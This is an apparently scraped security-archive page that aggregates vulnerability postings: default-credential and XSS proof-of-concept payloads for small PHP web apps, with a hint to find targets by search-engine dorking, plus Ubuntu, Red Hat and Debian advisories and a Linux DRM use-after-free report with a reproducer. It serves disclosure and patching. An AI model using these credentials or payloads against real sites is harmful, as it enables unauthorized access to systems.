Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.

==========================================================================  
Ubuntu Security Notice USN-6200-2  
July 25, 2024

imagemagick vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were  
incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the  
problem.

Original advisory details:

 It was discovered that ImageMagick incorrectly handled the "-authenticate"  
 option for password-protected PDF files. An attacker could possibly use  
 this issue to inject additional shell commands and perform arbitrary code  
 execution. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-29599)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing PDF files. If a user or automated system using ImageMagick  
 were tricked into opening a specially crafted PDF file, an attacker could  
 exploit this to cause a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20224)

  Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
 values when processing image data. If a user or automated system using  
 ImageMagick were tricked into opening a specially crafted image, an  
 attacker could exploit this to cause a denial of service. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20241, CVE-2021-20243)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing visual effects based image files. By tricking a user into  
 opening a specially crafted image file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20244, CVE-2021-20309)

  It was discovered that ImageMagick incorrectly handled certain values  
 when performing resampling operations. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20246)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing thumbnail image data. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20312)

  It was discovered that ImageMagick incorrectly handled memory cleanup  
 when performing certain cryptographic operations. Under certain conditions  
 sensitive cryptographic information could be disclosed. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20313)

  It was discovered that ImageMagick did not use the correct rights when  
 specifically excluded by a module policy. An attacker could use this issue  
 to read and write certain restricted files. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-39212)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2022-28463, CVE-2022-32545, CVE-2022-32546, CVE-2022-32547)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2021-3610, CVE-2023-1906,  
 CVE-2023-3428)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing specially crafted SVG files. By tricking a user into  
 opening a specially crafted SVG file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-1289)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 tiff file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-3195)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. (CVE-2023-34151)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6-common            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16hdri           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-common              8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-perl            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16-perl        8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16hdri-perl    8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6-headers           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-dev           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-8         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-dev       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-dev                 8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  perlmagick                      8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5

Ubuntu 20.04 LTS  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6-common            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16hdri           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-common              8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-perl            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16-perl        8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16hdri-perl    8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6-headers           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-8             8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-dev           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-8         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-dev       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-dev                 8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  perlmagick                      8:6.9.10.23+dfsg-2.1ubuntu11.10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6200-2  
  https://ubuntu.com/security/notices/USN-6200-1  
  CVE-2023-1289, CVE-2023-34151

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.10.23+dfsg-2.1ubuntu11.10

Ubuntu Security Notice USN-6200-2

Codeprojects E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Cross Site Scripting

Blog Site version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Blog Site 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : After LOgin index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 Cross Site Scripting 

Red Hat Security Advisory 2024-5001-03 - An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a server-side request forgery vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5001.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: httpd security updateAdvisory ID:        RHSA-2024:5001-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5001Issue date:         2024-08-06Revision:           03CVE Names:          CVE-2024-38473====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Encoding problem in mod_proxy (CVE-2024-38473)* httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38473References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2295012https://bugzilla.redhat.com/show_bug.cgi?id=2295022

Red Hat Security Advisory 2024-5001-03

Debian Linux Security Advisory 5737-1 - If LibreOffice failed to validate a signed macro, it displayed a warning but still allowed execution of the script after printing a warning. Going forward in high macro security mode such macros are now disabled.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5737-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 05, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libreoffice  
CVE ID         : CVE-2024-6472

If LibreOffice failed to validate a signed macro, it displayed a warning  
but still allowed execution of the script after printing a warning.  
Going forward in high macro security mode such macros are now disabled.

For additional information please refer to  
https://www.libreoffice.org/about-us/security/advisories/cve-2024-6472/

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:7.0.4-4+deb11u10.

For the stable distribution (bookworm), this problem has been fixed in  
version 4:7.4.7-1+deb12u4.

We recommend that you upgrade your libreoffice packages.

For the detailed security status of libreoffice please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libreoffice

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmaw7MgACgkQEMKTtsN8  
TjbwRg//Uj5T8Z48NWwyT/IrUxHiSGIPdjjg8l422Ya5oMfF28Ks3ApQPpMhnkwM  
YhsjZb6yRc9dxj81n5V78FtIKS5nqJ6A6NrPAb5fuan2pcULxbkvzDa9eGnhsg3G  
0+lhg60KsXs0Ef9ScjWARUcmW49ukqpnUEcTXWqmZ/DDF16G6OOD5oR4s5BUnBq0  
t41n5TvJC//13ptBnnI3iTq2rFMZz4jb/yoxGsc9WOvcTpb46yXKQnckIviMH4Nt  
FWsAOZuI24o9tWeB/HkOSCY/KploFkojrxQpIJg7M7UqCzK/woWI5JfuI+xaqSiB  
gibOqSohzYAxem1DhM/UckqXfgjpo91YgWVwbeaMfxX2VFCEUQW0ZiPQ/G4wQZMS  
zawp/6hMuBTIlX+zQaYb7uyC3iIUj3UFeGvoQmOfeSSxpDI4yp7cHNPQvSTe1mXB  
XlCzf8we/TzhjSKXcNvbYLnn2ro2fHRs3AwExZ+X24S1hfG+Fv9xnRk9VqqG8hiE  
Tc4nEX92aHprjDTXhofRG5oDEAmhz7nyVAWiyJDTYtQkdbooU5sDIjTol7Ednckp  
jTtkpajlIHfQrtjoxBFAU3MmUX1DIP8CUzOtrBsEdQ5yv3Y+zDLn4O1VJRGMfAzT  
TaZ7tFwYbE7/rQh/Kv6a55z1QfPK13aWLhLvx9jfwudl4zAytGk=  
=KIup  
-----END PGP SIGNATURE-----

Debian Security Advisory 5737-1

Ubuntu Security Notice 6944-1 - Dov Murik discovered that curl incorrectly handled parsing ASN.1 Generalized Time fields. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly obtain sensitive memory contents.

    ==========================================================================Ubuntu Security Notice USN-6944-1August 05, 2024curl vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:curl could be made to crash or expose information if it received speciallycrafted network traffic.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:Dov Murik discovered that curl incorrectly handled parsing ASN.1Generalized Time fields. A remote attacker could use this issue to causecurl to crash, resulting in a denial of service, or possibly obtainsensitive memory contents.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   curl                            8.5.0-2ubuntu10.2   libcurl3t64-gnutls              8.5.0-2ubuntu10.2   libcurl4t64                     8.5.0-2ubuntu10.2Ubuntu 22.04 LTS   curl                            7.81.0-1ubuntu1.17   libcurl3-gnutls                 7.81.0-1ubuntu1.17   libcurl3-nss                    7.81.0-1ubuntu1.17   libcurl4                        7.81.0-1ubuntu1.17Ubuntu 20.04 LTS   curl                            7.68.0-1ubuntu2.23   libcurl3-gnutls                 7.68.0-1ubuntu2.23   libcurl3-nss                    7.68.0-1ubuntu2.23   libcurl4                        7.68.0-1ubuntu2.23In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6944-1   CVE-2024-7264Package Information:   https://launchpad.net/ubuntu/+source/curl/8.5.0-2ubuntu10.2   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.17   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.23

Ubuntu Security Notice USN-6944-1

Linux DRM has drm_file_update_pid() call to get_pid() too late, which creates a race condition that can lead to use-after-free issue of a struct pid.

Linux: DRM: refcount incremented too late in drm_file_update_pid()

[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]

=== summary ===  
drm_file_update_pid() calls get_pid() too late, which creates a race  
condition that can lead to use-after-free of a `struct pid`.

I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.

=== verbose bug report ===  
drm_file_update_pid() contains the following code:

```  
  struct drm_device *dev;  
  struct pid *pid, *old;

  /*  
   * Master nodes need to keep the original ownership in order for  
   * drm_master_check_perm to keep working correctly. (See comment in  
   * drm_auth.c.)  
   */  
  if (filp->was_master)  
          return;

  pid = task_tgid(current);

  [...]

  dev = filp->minor->dev;  
  mutex_lock(&dev->filelist_mutex);  
  old = rcu_replace_pointer(filp->pid, pid, 1);  
  mutex_unlock(&dev->filelist_mutex);

  if (pid != old) {  
          get_pid(pid);  
          synchronize_rcu();  
          put_pid(old);  
  }  
```

filp->pid is a refcounted pointer which can only be modified under  
dev->filelist_mutex.  
After calling rcu_replace_pointer(), we have a refcount debt of 1, which is  
still fine because we're holding the mutex that prevents other tasks from  
taking ownership of the reference stored in filp->pid; but by the time we drop  
this mutex, we must have called get_pid() to make up for this refcount debt,  
and that isn't done.

So a use-after-free can occur in the following scenario, assuming filp->pid  
initially points to the pid of process A and process B's initial pid refcount  
is 1:

process A               process B  
=========               =========  
                        begin drm_file_update_pid  
                        mutex_lock(&dev->filelist_mutex)  
                        rcu_replace_pointer(filp->pid, <pid B>, 1)  
                        mutex_unlock(&dev->filelist_mutex)  
begin drm_file_update_pid  
mutex_lock(&dev->filelist_mutex)  
rcu_replace_pointer(filp->pid, <pid A>, 1)  
mutex_unlock(&dev->filelist_mutex)  
get_pid(<pid A>)  
synchronize_rcu()  
put_pid(<pid B>)   *** pid B reaches refcount 0 and is freed here ***  
                        get_pid(<pid B>)   *** UAF ***  
                        synchronize_rcu()  
                        put_pid(<pid A>)

Note that this race can only occur if RCU is configured so that  
running in preemptible task context can count as an RCU quiescent state.  
My testcase assumes that the kernel is configured for full preemption (meaning  
either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption  
selected at boot time); however, I think in theory the bug can probably be  
hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel  
builds with dynamic preemption), since I think on such builds, expedited grace  
periods can still detect RCU quiescent states with IPIs.

My reproducer also requires that you patch the following code into the kernel  
to slow down execution and make the bug easy to trigger:

```  
diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c  
index 638ffa4444f5..03e7711e9744 100644  
--- a/drivers/gpu/drm/drm_file.c  
+++ b/drivers/gpu/drm/drm_file.c  
@@ -38,6 +38,7 @@  
 #include <linux/pci.h>  
 #include <linux/poll.h>  
 #include <linux/slab.h>  
+#include <linux/delay.h>

 #include <drm/drm_client.h>  
 #include <drm/drm_drv.h>  
@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)  
        old = rcu_replace_pointer(filp->pid, pid, 1);  
        mutex_unlock(&dev->filelist_mutex);

+       if (strcmp(current->comm, \"SLOWME\") == 0) {  
+               pr_warn(\"%s: BEGIN DELAY\  
\", __func__);  
+               mdelay(1000);  
+               pr_warn(\"%s: END DELAY\  
\", __func__);  
+       }  
+  
        if (pid != old) {  
                get_pid(pid);  
                synchronize_rcu();  
```

The reproducer code:  
```  
#include <unistd.h>  
#include <stdio.h>  
#include <err.h>  
#include <fcntl.h>  
#include <stdlib.h>  
#include <sys/signal.h>  
#include <sys/ioctl.h>  
#include <sys/prctl.h>  
#include <sys/wait.h>  
#include <drm/drm.h>

#define SYSCHK(x) ({          \\  
  typeof(x) __res = (x);      \\  
  if (__res == (typeof(x))-1) \\  
    err(1, \"SYSCHK(\" #x \")\"); \\  
  __res;                      \\  
})

static void main_test_code() {  
  struct drm_version dummy_version;

  int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY));  
  int child = SYSCHK(fork());

  if (child == 0) {  
    /* child process */  
    prctl(PR_SET_NAME, \"SLOWME\");  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here  
  } else {  
    /* parent process */  
    usleep(200*1000);  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);  
  }

  if (child == 0) {  
    /* child process */  
    exit(0);  
  } else {  
    /* parent process */  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
    exit(0);  
  }  
}

int main(void) {  
  // run in a child process to avoid extra references from job control or such  
  int child = SYSCHK(fork());  
  if (child == 0) {  
    prctl(PR_SET_PDEATHSIG, SIGKILL);  
    main_test_code();  
  } else {  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
  }  
}  
```

The resulting KASAN splat (tested on mainline plus the race widener patch  
above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):  
```  
 ==================================================================  
 BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092

 CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384  
 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014  
 Call Trace:  
  <TASK>  
 dump_stack_lvl (lib/dump_stack.c:117)  
 print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  
 kasan_report (mm/kasan/report.c:603)  
 kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))  
 drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)  
[...]  
  </TASK>

 Allocated by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)  
 kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)  
 alloc_pid (kernel/pid.c:187)  
 copy_process (kernel/fork.c:2406)  
 kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)  
 __do_sys_clone (kernel/fork.c:2929)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 Freed by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))  
 poison_slab_object (mm/kasan/common.c:242)  
 __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))  
 kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))  
 put_pid.part.0 (kernel/pid.c:122)  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 The buggy address belongs to the object at ffff88811f2f68c0  
  which belongs to the cache pid of size 240  
 The buggy address is located 0 bytes inside of  
  freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)

 The buggy address belongs to the physical page:  
